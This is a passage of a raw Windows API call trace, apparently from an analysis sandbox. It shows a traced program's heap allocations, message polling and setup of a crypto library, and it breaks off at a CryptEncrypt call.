0x43e9a40 [0086.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0086.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9a40 | out: hHeap=0x1780000) returned 1 [0086.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0086.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0086.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0086.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0086.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0086.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0086.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0086.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0086.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0086.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0086.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0086.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e93c8 [0086.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0086.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e93c8 | out: hHeap=0x1780000) returned 1 [0086.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0086.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0086.069] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0086.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0086.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0086.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0086.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0086.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0086.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0086.069] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0086.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0086.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0086.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0086.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ec8 [0086.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0086.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0086.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0086.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0086.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0086.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0086.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac040 [0086.070] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0086.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0086.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0086.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0086.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0086.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e88 [0086.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e28a8 [0086.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0086.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0086.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0086.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0086.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0086.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0086.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0086.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0086.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e28a8 | out: hHeap=0x1780000) returned 1 [0086.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0086.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0086.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0086.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0086.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0086.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac040 | out: hHeap=0x1780000) returned 1 [0086.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0086.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0086.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0086.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0086.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0086.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0086.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0086.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0086.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0086.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0086.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0086.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0086.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e95f0 | out: hHeap=0x1780000) returned 1 [0086.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0086.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0086.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca148 | out: hHeap=0x1780000) returned 1 [0086.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0086.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0086.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0086.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0086.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0086.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0086.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0086.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0086.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0086.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0086.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fc8 | out: hHeap=0x1780000) returned 1 [0086.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0086.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0086.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0086.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ff8 | out: hHeap=0x1780000) returned 1 [0086.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0086.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2848 | out: hHeap=0x1780000) returned 1 [0086.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0086.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0086.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0086.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0d0 | out: hHeap=0x1780000) returned 1 [0086.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca058 | out: hHeap=0x1780000) returned 1 [0086.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0086.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2370 [0086.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea2e0 [0086.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0086.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2370 [0086.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2330 [0086.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0086.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0086.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca160 [0086.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0086.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0086.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fc8 [0086.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0086.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0086.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0086.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fe0 [0086.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24c0 [0086.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f20 [0086.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca058 [0086.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2330 [0086.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0086.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f38 [0086.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24d0 [0086.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fb0 [0086.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca148 [0086.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0086.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0086.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ff8 [0086.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0086.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca058 [0086.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ea8 [0086.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0086.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0086.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca148 [0086.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0086.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0086.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca148 [0086.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0d0 [0086.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2330 [0086.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0086.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0d0 [0086.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0086.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca160 [0086.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0086.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2370 [0086.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2370 [0086.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0086.074] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0086.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca178 [0086.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0086.075] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0086.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2370 [0086.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0086.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0086.075] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0086.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9e90 [0086.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0086.075] PeekMessageW (in: lpMsg=0x144e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e734) returned 0 [0086.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0086.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0086.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0086.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0086.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0086.075] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0086.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2370 [0086.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a48 [0086.075] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0086.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9e90 [0086.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0086.076] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0086.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2370 [0086.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2370 [0086.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2370 [0086.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2370 [0086.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2370 [0086.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea0b8 [0086.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0086.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41abfc0 [0086.076] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0086.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2370 [0086.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0086.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0086.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0086.076] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0086.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2370 [0086.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0086.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0086.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0086.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0086.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b28 [0086.076] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0086.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9e90 [0086.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0086.077] PeekMessageW (in: lpMsg=0x144e744, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e744) returned 0 [0086.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0086.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0086.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0086.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0086.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ea8 [0086.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0086.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0086.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0086.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0086.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0086.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0086.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0086.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0086.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0086.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0086.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0086.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0086.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0086.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0086.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0086.078] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0086.078] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0086.078] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0086.078] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0086.078] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0086.078] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0086.078] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0086.078] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0086.078] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0086.078] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0086.078] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0086.078] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0086.078] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0086.078] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0086.078] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0086.078] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0086.078] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0086.078] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0086.078] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0086.078] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0086.078] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0086.079] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0086.079] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0086.079] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11a) returned 0x43e8288 [0086.079] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0086.079] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0086.079] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0086.079] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0086.079] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0086.079] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0086.079] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd) returned 0x43ca400 [0086.079] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca400, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0086.079] CryptEncrypt (in: 